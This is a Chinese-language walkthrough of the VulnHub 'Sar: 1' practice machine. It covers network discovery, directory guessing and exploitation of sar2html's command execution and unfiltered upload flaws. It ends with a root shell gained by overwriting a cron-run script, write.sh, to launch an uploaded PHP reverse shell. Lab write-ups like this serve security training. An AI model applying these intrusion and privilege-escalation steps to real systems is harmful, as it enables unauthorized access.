本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机下载之后使用仅主机模式加载到本地VMware Workstation工作站,需要发现目标靶机的IP地址,可以使用nmap,netdiscover,或者arp之类的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 当然也是可以使用Windows环境下mac地址扫描工具都是可以的,那么本次演示就是arp-scan工具发现
地址:https://www.vulnhub.com/entry/sar-1,425/
根据扫描结果开放了80端口,使用dirb http://192.168.56.105
发现猜解出来上述目录,访问robots.txt文件找到一个访问路径
直接访问这个地址看看
在谷歌和GitHub上搜索关键字,发现此版本刚好存在远程命令执行漏洞和文件上传,具体演示如下:
远程命令执行:https://www.exploit-db.com/exploits/47204
文件上传漏洞:https://github.com/cemtan/sar2html 这里的文件上传没有任何过滤,并且这个GitHub地址上给出了默认路径,尝试默认路径可以直接知道上传shell的路径
shell的路径就是上面GitHub地址披露的路径
http://192.168.56.105/sar2HTML/sarDATA/uPLOAD/shell.php
同时上传一个反弹的php-reverse-shell.php
知道计划任务是可以提权的,那么我们直接找到这个脚本,发现里面是执行脚本write.sh,那么我们直接echo执行php的反弹shell
echo '#!/bin/sh' > write.sh echo "php /var/www/html/sar2HTML/sarDATA/uPLOAD/php-reverse-shell.php" >> write.sh
最终没有问题的话,直接反弹成功root权限的shell
